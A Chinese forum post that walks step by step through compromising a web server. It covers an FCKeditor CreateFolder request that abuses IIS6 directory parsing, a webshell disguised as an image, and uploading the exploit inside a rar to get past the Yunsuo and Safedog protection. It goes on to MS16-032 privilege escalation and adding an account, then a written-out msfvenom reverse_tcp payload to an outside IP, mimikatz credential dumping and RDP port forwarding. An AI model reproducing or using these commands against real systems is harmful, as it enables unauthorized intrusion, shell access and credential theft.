admin 发表于 2018-10-20 20:31:43

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

<p style="margin:0cm 0cm 0.0001pt;text-align:justify;">
        <table border="0" cellpadding="0" cellspacing="0" width="1122" style="border-collapse:collapse;font-family:等线;font-size:10.5pt;margin-left:.75pt;width:841.5pt;" class="ke-zeroborder">
                <tbody>
                        <tr>
                                <td style="padding:0cm 0cm 0cm 0cm;">
                                        <p align="left" style="font-family:等线;font-size:10.5pt;line-height:19.2pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
                                                <span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
</span><span style="color:#444444;font-family:宋体;">一、</span><span style="color:#444444;font-family:Verdana,sans-serif;"> </span><span style="color:#444444;font-family:宋体;">利用</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">getwebshell</span><span style="color:#444444;font-family:宋体;">篇</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
</span><span style="color:#444444;font-family:宋体;">首先对目标站进行扫描,发现是</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">asp</span><span style="color:#444444;font-family:宋体;">的,直接扫出网站后台和默认数据库,下载解密登陆如图:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<img width="553" height="314" src="https://www.2k8.org/content/uploadfile/202203/17/084eed98.png" alt="" style="vertical-align:middle;" /><br />
<img width="600" height="357" src="https://www.2k8.org/content/uploadfile/202203/17/7f2d4fb8.png" alt="222.png" style="vertical-align:middle;" /><br />
</span><span style="color:#444444;font-family:宋体;">下面进后台发现有</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">fckeditor</span><span style="color:#444444;font-family:宋体;">,而且还是</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">iis6.0</span><span style="color:#444444;font-family:宋体;">的,可以考虑创建个</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">asp</span><span style="color:#444444;font-family:宋体;">目录来构造解析(</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">fck</span><span style="color:#444444;font-family:宋体;">编辑器路径被改成别的需要</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">burpsuite</span><span style="color:#444444;font-family:宋体;">抓包的时候看到)</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<img width="600" height="289" src="https://www.2k8.org/content/uploadfile/202203/17/2338000b.png" alt="333.png" style="vertical-align:middle;" /><br />
</span><span style="color:#444444;font-family:宋体;">下面我们构造一个</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">asp</span><span style="color:#444444;font-family:宋体;">目录,如:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"></span>
                                        </p>
                                        <p align="left" style="font-family:等线;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
                                                <span lang="EN-US" style="color:#66D9EF;font-family:宋体;font-size:12.0pt;">http:</span><span lang="EN-US" style="color:#444444;font-family:宋体;font-size:12.0pt;">/</span><span lang="EN-US" style="color:#AE81FF;font-family:宋体;font-size:12.0pt;">/www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector</span><span lang="EN-US" style="color:#444444;font-family:宋体;font-size:12.0pt;">.asp?Command=CreateFolder&amp;Type=Image&amp;CurrentFolder=%</span><span lang="EN-US" style="color:#AE81FF;font-family:宋体;font-size:12.0pt;">2</span><span lang="EN-US" style="color:#444444;font-family:宋体;font-size:12.0pt;">Fshell.asp&amp;NewFolderName=z&amp;uuid=</span><span lang="EN-US" style="color:#AE81FF;font-family:宋体;font-size:12.0pt;">1244789975</span><span lang="EN-US" style="color:#444444;font-family:宋体;font-size:12.0pt;"></span>
                                        </p>
                                        <p align="left" style="font-family:等线;font-size:10.5pt;line-height:19.2pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
                                                <span style="color:#444444;font-family:宋体;">然后再给</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">shell.asp</span><span style="color:#444444;font-family:宋体;">目录上传一个</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">jpg</span><span style="color:#444444;font-family:宋体;">图片格式的一句话,然后用</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">hatchet</span><span style="color:#444444;font-family:宋体;">打开,然后看了一下支持</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">aspx</span><span style="color:#444444;font-family:宋体;">,那么我们就用包含的办法先把</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">aspx</span><span style="color:#444444;font-family:宋体;">后缀名改成</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">.rar</span><span style="color:#444444;font-family:宋体;">,然后再创建个</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">111.ASPx</span><span style="color:#444444;font-family:宋体;">,里面包含</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">rar</span><span style="color:#444444;font-family:宋体;">文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
</span><span style="color:#444444;font-family:宋体;">一、</span><span style="color:#444444;font-family:Verdana,sans-serif;"> </span><span style="color:#444444;font-family:宋体;">绕过安全狗云锁提权并且加账号</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<img width="600" height="207" src="https://www.2k8.org/content/uploadfile/202203/17/f275795b.png" alt="444.png" style="vertical-align:middle;" /><br />
</span><span style="color:#444444;font-family:宋体;">没法看系统信息,但是根据网站</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">404</span><span style="color:#444444;font-family:宋体;">页面可以断定是</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">2003</span><span style="color:#444444;font-family:宋体;">服务器,然后接着访问</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">C:\Program Files   (x86)</span><span style="color:#444444;font-family:宋体;">存在断定是</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">2003 64</span><span style="color:#444444;font-family:宋体;">位系统,那么我们说干就干,我们上传</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">ms16-032 64</span><span style="color:#444444;font-family:宋体;">位直接干,但是发现上传</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">exe</span><span style="color:#444444;font-family:宋体;">或者别的格式</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">exp</span><span style="color:#444444;font-family:宋体;">会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">rar</span><span style="color:#444444;font-family:宋体;">,先把</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">exp</span><span style="color:#444444;font-family:宋体;">打包为</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">64.rar</span><span style="color:#444444;font-family:宋体;">上传,然后我们翻一下</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">rar</span><span style="color:#444444;font-family:宋体;">在哪个目录,在</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">C:\Program Files   (x86)</span><span style="color:#444444;font-family:宋体;">,然后开干</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
</span><span style="color:#444444;font-family:宋体;">如图:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<img width="600" height="242" src="https://www.2k8.org/content/uploadfile/202203/17/5d32a305.png" alt="555.png" style="vertical-align:middle;" /><br />
</span><span style="color:#444444;font-family:宋体;">然后执行直接是</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">system</span><span style="color:#444444;font-family:宋体;">权限</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">,</span><span style="color:#444444;font-family:宋体;">然后我用干狗神器给加了一个账号用</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">tunna</span><span style="color:#444444;font-family:宋体;">反弹</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">3968</span><span style="color:#444444;font-family:宋体;">提示不是远程组,我操后来也想着用</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">getpassword64</span><span style="color:#444444;font-family:宋体;">抓明文密码,但是一执行就卡死,没办法想到了</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">metasploit<br />
<br />
</span><span style="color:#444444;font-family:宋体;">一、</span><span style="color:#444444;font-family:Verdana,sans-serif;"> </span><span style="color:#444444;font-family:宋体;">利用</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">metasploit<br />
<br />
</span><span style="color:#444444;font-family:宋体;">首先用</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">pentestbox</span><span style="color:#444444;font-family:宋体;">生成一个</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">64</span><span style="color:#444444;font-family:宋体;">位的</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">payload</span><span style="color:#444444;font-family:宋体;">如下命令</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f   exe &gt; c:\mata.exe<br />
<br />
</span><span style="color:#444444;font-family:宋体;">为什么要用</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">443</span><span style="color:#444444;font-family:宋体;">端口,之前我测试用别的端口直接被墙了没法上线,下面我们在</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">system</span><span style="color:#444444;font-family:宋体;">下执行这个</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">mata</span><span style="color:#444444;font-family:宋体;">,上线如图:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<img width="600" height="137" src="https://www.2k8.org/content/uploadfile/202203/17/e7cead77.png" alt="11.png" style="vertical-align:middle;" /><br />
</span><span style="color:#444444;font-family:宋体;">下面我们用这个命令抓一下明文密码命令</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">1</span><span style="color:#444444;font-family:宋体;">:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">use mimikatz </span><span style="color:#444444;font-family:宋体;">命令</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">2</span><span style="color:#444444;font-family:宋体;">:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">kerberos</span><span style="color:#444444;font-family:宋体;">如下图:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<img width="601" height="260" src="https://www.2k8.org/content/uploadfile/202203/17/95df3652.png" alt="13.png" style="vertical-align:middle;" /><br />
</span><span style="color:#444444;font-family:宋体;">下面我们来做一个监听如下命令:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<br />
portfwd add -l 6655 -p 3968 -r 127.0.0.1</span><span style="color:#444444;font-family:宋体;">,这个命令的意思就是把目标服务器的远程</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">3968</span><span style="color:#444444;font-family:宋体;">转发到</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">pentestbox</span><span style="color:#444444;font-family:宋体;">的公网</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">IP</span><span style="color:#444444;font-family:宋体;">的</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;">6655</span><span style="color:#444444;font-family:宋体;">端口如图:</span><span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;"><br />
<img width="600" height="194" src="https://www.2k8.org/content/uploadfile/202203/17/5520c6cf.png" alt="18.png" style="vertical-align:middle;" /></span>
                                        </p>
                                </td>
                        </tr>
                </tbody>
        </table>
</p>
<p style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
        <span lang="EN-US" style="color:#444444;font-family:Verdana,sans-serif;font-size:9.0pt;"><br />
<br />
</span><span lang="EN-US"></span>
</p>
<br />
<!----><span lang="EN-US"></span>
<p>
        <br />
</p>

发表于 2021-11-20 23:30:06

图片怎么都没了
页: [1]
查看完整版本: 从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器